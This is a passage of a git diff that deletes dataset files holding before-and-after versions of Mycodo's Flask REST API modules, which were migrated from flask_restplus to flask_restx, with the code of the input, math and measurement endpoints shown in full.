mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import input_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_input = api.namespace('inputs', description='Input operations') - -input_single_fields = api.model('Input Status Fields', { - 'input settings': fields.Nested(input_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -input_list_fields = api.model('Input Fields List', { - 'input settings': fields.List(fields.Nested(input_fields)), -}) - - -@ns_input.route('/') -@ns_input.doc(security='apikey', responses=default_responses) -class Inputs(Resource): - """Input information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_input.marshal_with(input_list_fields) - @flask_login.login_required - def get(self): - """Show all input settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(InputSchema, Input) - if list_data: - return {'input settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_input.route('/') -@ns_input.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input'} -) -class SettingsInputsUniqueID(Resource): - """Interacts with input settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_input.marshal_with(input_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for an input""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(InputSchema, Input, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'input settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_input.route('//force-measurement') -@ns_input.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the input.'} -) -class InputsUniqueID(Resource): - """Input with Unique ID""" - - @accept('application/vnd.mycodo.v1+json') - @flask_login.login_required - def post(self, unique_id): - """Force an input to acquire measurements""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - try: - control = DaemonControl() - return_ = control.input_force_measurements(unique_id) - if return_[0]: - return {'message': return_[1]}, 460 - else: - return {'message': return_[1]}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.diff deleted file mode 100644 index fe1ff8b..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/math.py b/mycodo/mycodo_flask/api/math.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/math.py - +++ b/mycodo/mycodo_flask/api/math.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import DeviceMeasurements - from mycodo.databases.models import Math diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.source.py deleted file mode 100644 index bdbfa4e..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.source.py +++ /dev/null @@ -1,90 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Math -from mycodo.databases.models.math import MathSchema -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import math_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_math = api.namespace('maths', description='Math operations') - -math_single_fields = api.model('Math Status Fields', { - 'math settings': fields.Nested(math_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -math_list_fields = api.model('Math Fields List', { - 'math settings': fields.List(fields.Nested(math_fields)), -}) - - -@ns_math.route('/') -@ns_math.doc(security='apikey', responses=default_responses) -class Maths(Resource): - """Math information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_math.marshal_with(math_list_fields) - @flask_login.login_required - def get(self): - """Show all math settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MathSchema, Math) - if list_data: - return {'math settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_math.route('/') -@ns_math.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the math'} -) -class SettingsMathsUniqueID(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_math.marshal_with(math_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a math""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(MathSchema, Math, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'math settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.target.py deleted file mode 100644 index 89ba4b7..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$math.py.target.py +++ /dev/null @@ -1,90 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Math -from mycodo.databases.models.math import MathSchema -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import math_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -ns_math = api.namespace('maths', description='Math operations') - -math_single_fields = api.model('Math Status Fields', { - 'math settings': fields.Nested(math_fields), - 'device measurements': fields.List( - fields.Nested(device_measurement_fields)), -}) - -math_list_fields = api.model('Math Fields List', { - 'math settings': fields.List(fields.Nested(math_fields)), -}) - - -@ns_math.route('/') -@ns_math.doc(security='apikey', responses=default_responses) -class Maths(Resource): - """Math information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_math.marshal_with(math_list_fields) - @flask_login.login_required - def get(self): - """Show all math settings""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(MathSchema, Math) - if list_data: - return {'math settings': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_math.route('/') -@ns_math.doc( - security='apikey', - responses=default_responses, - params={'unique_id': 'The unique ID of the math'} -) -class SettingsMathsUniqueID(Resource): - """Interacts with math settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_math.marshal_with(math_single_fields) - @flask_login.login_required - def get(self, unique_id): - """Show the settings for a math""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - dict_data = get_from_db(MathSchema, Math, unique_id=unique_id) - - measure_schema = DeviceMeasurementsSchema() - list_data = return_list_of_dictionaries( - measure_schema.dump( - DeviceMeasurements.query.filter_by( - device_id=unique_id).all(), many=True)) - - return {'math settings': dict_data, - 'device measurements': list_data}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.diff deleted file mode 100644 index 1b80daf..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/measurement.py b/mycodo/mycodo_flask/api/measurement.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/measurement.py - +++ b/mycodo/mycodo_flask/api/measurement.py -@@ -5,9 +5,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.mycodo_flask.api import api - from mycodo.mycodo_flask.api import default_responses diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.source.py deleted file mode 100644 index bc8b65d..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.source.py +++ /dev/null @@ -1,313 +0,0 @@ -# coding=utf-8 -import datetime -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general -from mycodo.utils.influx import read_influxdb_function -from mycodo.utils.influx import read_influxdb_list -from mycodo.utils.influx import read_influxdb_single -from mycodo.utils.influx import valid_date_str -from mycodo.utils.influx import write_influxdb_value - -logger = logging.getLogger(__name__) - -ns_measurement = api.namespace( - 'measurements', description='Measurement operations') - -measurement_create_fields = ns_measurement.model('Measurement Create Fields', { - 'timestamp': fields.DateTime( - description='The timestamp of the measurement, in %Y-%m-%dT%H:%M:%S.%fZ format ' - '(e.g. 2019-04-15T18:07:00.392Z). (Optional; exclude to create a ' - 'measurement with a timestamp of the current time)', - dt_format='iso8601', - required=False) -}) - -measurement_fields = ns_measurement.model('Measurement Fields', { - 'time': fields.DateTime(dt_format='iso8601'), - 'value': fields.Float, -}) - -measurement_list_fields = ns_measurement.model('Measurement Fields List', { - 'measurements': fields.List(fields.Nested(measurement_fields)), -}) - -measurement_function_fields = ns_measurement.model('Measurement Function Fields', { - 'value': fields.Float, -}) - - -@ns_measurement.route('/create////') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'value': 'the value of the measurement' - } -) -class MeasurementsCreate(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.expect(measurement_create_fields) - @flask_login.login_required - def post(self, unique_id, unit, channel, value): - """Create a measurement""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - - try: - value = float(value) - except: - abort(422, custom='value does not represent a float') - - timestamp = None - if ns_measurement.payload and 'timestamp' in ns_measurement.payload: - ts = ns_measurement.payload["timestamp"] - if ts is not None: - if valid_date_str(ts): - timestamp = datetime.datetime.strptime( - ts, '%Y-%m-%dT%H:%M:%S.%fZ') - else: - abort(422, custom='Invalid timestamp format. Must be formatted as %Y-%m-%dT%H:%M:%S.%fZ') - - try: - return_ = write_influxdb_value( - unique_id, unit, value, channel=channel, timestamp=timestamp) - - if return_: - abort(500) - else: - return {'message': 'Success'}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/historical/////') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'epoch_start': 'The start time, as epoch. Set to 0 for none.', - 'epoch_end': 'The start time, as epoch. Set to 0 for none.' - } -) -class MeasurementsHistorical(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, epoch_start, epoch_end): - """ - Return a list of measurements found within a time range - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if epoch_start < 0 or epoch_end < 0: - abort(422, custom='epoch_start and epoch_end must be >= 0') - - utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now() - - if epoch_start: - start = datetime.datetime.fromtimestamp(float(epoch_start)) - start += utc_offset_timedelta - start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - start_str = None - - if epoch_end: - end = datetime.datetime.fromtimestamp(float(epoch_end)) - end += utc_offset_timedelta - end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - end_str = None - - try: - return_ = read_influxdb_list( - unique_id, unit, channel, start_str=start_str, end_str=end_str) - if return_ and len(return_) > 0: - dict_return = {'measurements': []} - for each_set in return_: - dict_return['measurements'].append( - {'time': each_set[0], 'value': each_set[1]}) - return dict_return, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/historical_function//////') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'epoch_start': 'The start time, as epoch. Set to 0 for none.', - 'epoch_end': 'The start time, as epoch. Set to 0 for none.', - 'function': 'The InfluxDB function to apply to the measurements. ' - 'For example, SUM, MIN, MAX, STDDEV, etc. ' - 'See https://docs.influxdata.com/influxdb/v1.7/query_language/functions/ for more information.' - } -) -class MeasurementsHistoricalFunction(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_function_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, epoch_start, epoch_end, function): - """ - Return the value of a function of measurements found within a time range - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if epoch_start < 0 or epoch_end < 0: - abort(422, custom='epoch_start and epoch_end must be >= 0') - - utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now() - - if epoch_start: - start = datetime.datetime.fromtimestamp(float(epoch_start)) - start += utc_offset_timedelta - start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - start_str = None - - if epoch_end: - end = datetime.datetime.fromtimestamp(float(epoch_end)) - end += utc_offset_timedelta - end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - end_str = None - - try: - return_ = read_influxdb_function( - unique_id, unit, channel, function, start_str=start_str, end_str=end_str) - if return_ and len(return_) == 2: - return {'function': function, 'value': return_[1]}, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/last////') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'past_seconds': 'How many seconds in the past to query.' - } -) -class MeasurementsLast(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, past_seconds): - """ - Return the last measurement found within a duration from the past to the present - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if past_seconds < 1: - abort(422, custom='past_seconds must be >= 1') - - try: - return_ = read_influxdb_single( - unique_id, unit, channel, duration_sec=past_seconds) - if return_ and len(return_) == 2: - return {'time': return_[0], 'value': return_[1]}, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/past////') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'past_seconds': 'How many seconds in the past to query.' - } -) -class MeasurementsPast(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, past_seconds): - """ - Return a list of measurements found within a duration from the past to the present - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if past_seconds < 1: - abort(422, custom='past_seconds must be >= 1') - - try: - return_ = read_influxdb_list( - unique_id, unit, channel, duration_sec=past_seconds) - if return_ and len(return_) > 0: - dict_return = {'measurements': []} - for each_set in return_: - dict_return['measurements'].append( - {'time': each_set[0], 'value': each_set[1]}) - return dict_return, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.target.py deleted file mode 100644 index 0b987eb..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$measurement.py.target.py +++ /dev/null @@ -1,313 +0,0 @@ -# coding=utf-8 -import datetime -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restx import Resource -from flask_restx import abort -from flask_restx import fields - -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.utils import utils_general -from mycodo.utils.influx import read_influxdb_function -from mycodo.utils.influx import read_influxdb_list -from mycodo.utils.influx import read_influxdb_single -from mycodo.utils.influx import valid_date_str -from mycodo.utils.influx import write_influxdb_value - -logger = logging.getLogger(__name__) - -ns_measurement = api.namespace( - 'measurements', description='Measurement operations') - -measurement_create_fields = ns_measurement.model('Measurement Create Fields', { - 'timestamp': fields.DateTime( - description='The timestamp of the measurement, in %Y-%m-%dT%H:%M:%S.%fZ format ' - '(e.g. 2019-04-15T18:07:00.392Z). (Optional; exclude to create a ' - 'measurement with a timestamp of the current time)', - dt_format='iso8601', - required=False) -}) - -measurement_fields = ns_measurement.model('Measurement Fields', { - 'time': fields.DateTime(dt_format='iso8601'), - 'value': fields.Float, -}) - -measurement_list_fields = ns_measurement.model('Measurement Fields List', { - 'measurements': fields.List(fields.Nested(measurement_fields)), -}) - -measurement_function_fields = ns_measurement.model('Measurement Function Fields', { - 'value': fields.Float, -}) - - -@ns_measurement.route('/create////') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'value': 'the value of the measurement' - } -) -class MeasurementsCreate(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.expect(measurement_create_fields) - @flask_login.login_required - def post(self, unique_id, unit, channel, value): - """Create a measurement""" - if not utils_general.user_has_permission('edit_controllers'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - - try: - value = float(value) - except: - abort(422, custom='value does not represent a float') - - timestamp = None - if ns_measurement.payload and 'timestamp' in ns_measurement.payload: - ts = ns_measurement.payload["timestamp"] - if ts is not None: - if valid_date_str(ts): - timestamp = datetime.datetime.strptime( - ts, '%Y-%m-%dT%H:%M:%S.%fZ') - else: - abort(422, custom='Invalid timestamp format. Must be formatted as %Y-%m-%dT%H:%M:%S.%fZ') - - try: - return_ = write_influxdb_value( - unique_id, unit, value, channel=channel, timestamp=timestamp) - - if return_: - abort(500) - else: - return {'message': 'Success'}, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/historical/////') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'epoch_start': 'The start time, as epoch. Set to 0 for none.', - 'epoch_end': 'The start time, as epoch. Set to 0 for none.' - } -) -class MeasurementsHistorical(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, epoch_start, epoch_end): - """ - Return a list of measurements found within a time range - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if epoch_start < 0 or epoch_end < 0: - abort(422, custom='epoch_start and epoch_end must be >= 0') - - utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now() - - if epoch_start: - start = datetime.datetime.fromtimestamp(float(epoch_start)) - start += utc_offset_timedelta - start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - start_str = None - - if epoch_end: - end = datetime.datetime.fromtimestamp(float(epoch_end)) - end += utc_offset_timedelta - end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - end_str = None - - try: - return_ = read_influxdb_list( - unique_id, unit, channel, start_str=start_str, end_str=end_str) - if return_ and len(return_) > 0: - dict_return = {'measurements': []} - for each_set in return_: - dict_return['measurements'].append( - {'time': each_set[0], 'value': each_set[1]}) - return dict_return, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/historical_function//////') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'epoch_start': 'The start time, as epoch. Set to 0 for none.', - 'epoch_end': 'The start time, as epoch. Set to 0 for none.', - 'function': 'The InfluxDB function to apply to the measurements. ' - 'For example, SUM, MIN, MAX, STDDEV, etc. ' - 'See https://docs.influxdata.com/influxdb/v1.7/query_language/functions/ for more information.' - } -) -class MeasurementsHistoricalFunction(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_function_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, epoch_start, epoch_end, function): - """ - Return the value of a function of measurements found within a time range - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if epoch_start < 0 or epoch_end < 0: - abort(422, custom='epoch_start and epoch_end must be >= 0') - - utc_offset_timedelta = datetime.datetime.utcnow() - datetime.datetime.now() - - if epoch_start: - start = datetime.datetime.fromtimestamp(float(epoch_start)) - start += utc_offset_timedelta - start_str = start.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - start_str = None - - if epoch_end: - end = datetime.datetime.fromtimestamp(float(epoch_end)) - end += utc_offset_timedelta - end_str = end.strftime('%Y-%m-%dT%H:%M:%S.%fZ') - else: - end_str = None - - try: - return_ = read_influxdb_function( - unique_id, unit, channel, function, start_str=start_str, end_str=end_str) - if return_ and len(return_) == 2: - return {'function': function, 'value': return_[1]}, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/last////') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'past_seconds': 'How many seconds in the past to query.' - } -) -class MeasurementsLast(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, past_seconds): - """ - Return the last measurement found within a duration from the past to the present - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if past_seconds < 1: - abort(422, custom='past_seconds must be >= 1') - - try: - return_ = read_influxdb_single( - unique_id, unit, channel, duration_sec=past_seconds) - if return_ and len(return_) == 2: - return {'time': return_[0], 'value': return_[1]}, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) - - -@ns_measurement.route('/past////') -@ns_measurement.doc( - security='apikey', - responses=default_responses, - params={ - 'unique_id': 'The unique ID of the measurement', - 'unit': 'The unit of the measurement', - 'channel': 'The channel of the measurement', - 'past_seconds': 'How many seconds in the past to query.' - } -) -class MeasurementsPast(Resource): - """Interacts with Measurement settings in the SQL database""" - - @accept('application/vnd.mycodo.v1+json') - @ns_measurement.marshal_with(measurement_list_fields) - @flask_login.login_required - def get(self, unique_id, unit, channel, past_seconds): - """ - Return a list of measurements found within a duration from the past to the present - """ - if not utils_general.user_has_permission('view_settings'): - abort(403) - - if channel < 0: - abort(422, custom='channel must be >= 0') - if past_seconds < 1: - abort(422, custom='past_seconds must be >= 1') - - try: - return_ = read_influxdb_list( - unique_id, unit, channel, duration_sec=past_seconds) - if return_ and len(return_) > 0: - dict_return = {'measurements': []} - for each_set in return_: - dict_return['measurements'].append( - {'time': each_set[0], 'value': each_set[1]}) - return dict_return, 200 - else: - return return_, 200 - except Exception: - abort(500, - message='An exception occurred', - error=traceback.format_exc()) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.diff deleted file mode 100644 index b461648..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.diff +++ /dev/null @@ -1,17 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/output.py b/mycodo/mycodo_flask/api/output.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/output.py - +++ b/mycodo/mycodo_flask/api/output.py -@@ -4,9 +4,9 @@ import traceback - - import flask_login - from flask_accept import accept --from flask_restplus import Resource --from flask_restplus import abort --from flask_restplus import fields -+from flask_restx import Resource -+from flask_restx import abort -+from flask_restx import fields - - from mycodo.databases.models import DeviceMeasurements - from mycodo.databases.models import Output diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.source.py deleted file mode 100644 index 5768093..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$output.py.source.py +++ /dev/null @@ -1,194 +0,0 @@ -# coding=utf-8 -import logging -import traceback - -import flask_login -from flask_accept import accept -from flask_restplus import Resource -from flask_restplus import abort -from flask_restplus import fields - -from mycodo.databases.models import DeviceMeasurements -from mycodo.databases.models import Output -from mycodo.databases.models.measurement import DeviceMeasurementsSchema -from mycodo.databases.models.output import OutputSchema -from mycodo.mycodo_client import DaemonControl -from mycodo.mycodo_flask.api import api -from mycodo.mycodo_flask.api import default_responses -from mycodo.mycodo_flask.api.sql_schema_fields import device_measurement_fields -from mycodo.mycodo_flask.api.sql_schema_fields import output_fields -from mycodo.mycodo_flask.api.utils import get_from_db -from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries -from mycodo.mycodo_flask.utils import utils_general -from mycodo.mycodo_flask.utils.utils_output import get_all_output_states - -logger = logging.getLogger(__name__) - -ns_output = api.namespace('outputs', description='Output operations') - -output_states_fields = ns_output.model('Output States Fields', { - 'unique_id': fields.String, - 'state': fields.String -}) - -output_list_fields = api.model('Output Fields List', { - 'output settings': fields.List(fields.Nested(output_fields)), - 'output states': fields.Nested(output_states_fields) -}) - -output_unique_id_fields = ns_output.model('Output Status Fields', { - 'output settings': fields.Nested(output_fields), - 'output device measurements': fields.List( - fields.Nested(device_measurement_fields)), - 'output state': fields.String -}) - -output_set_fields = ns_output.model('Output Modulation Fields', { - 'state': fields.Boolean( - description='Set a non-PWM output state to on (True) or off (False).', - required=False), - 'duration': fields.Float( - description='The duration to keep a non-PWM output on, in seconds.', - required=False, - example=10.0, - exclusiveMin=0), - 'duty_cycle': fields.Float( - description='The duty cycle to set a PWM output, in percent (%).', - required=False, - example=50.0, - min=0) -}) - - -def return_handler(return_): - if return_ is None: - return {'message': 'Success'}, 200 - elif return_[0] in [0, 'success']: - return {'message': 'Success: {}'.format(return_[1])}, 200 - elif return_[0] in [1, 'error']: - return {'message': 'Fail: {}'.format(return_[1])}, 460 - else: - return '', 500 - - -@ns_output.route('/') -@ns_output.doc(security='apikey', responses=default_responses) -class Inputs(Resource): - """Output information""" - - @accept('application/vnd.mycodo.v1+json') - @ns_output.marshal_with(output_list_fields) - @flask_login.login_required - def get(self): - """Show all output settings and statuses""" - if not utils_general.user_has_permission('view_settings'): - abort(403) - try: - list_data = get_from_db(OutputSchema, Output) - states = get_all_output_states() - if 